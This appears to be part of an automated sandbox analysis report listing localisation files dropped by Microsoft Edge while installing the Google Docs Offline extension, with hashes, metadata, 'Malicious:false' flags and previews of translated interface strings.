                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                    SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                    SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                    SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                    MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                    SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                    SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                    SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                    Malicious:false
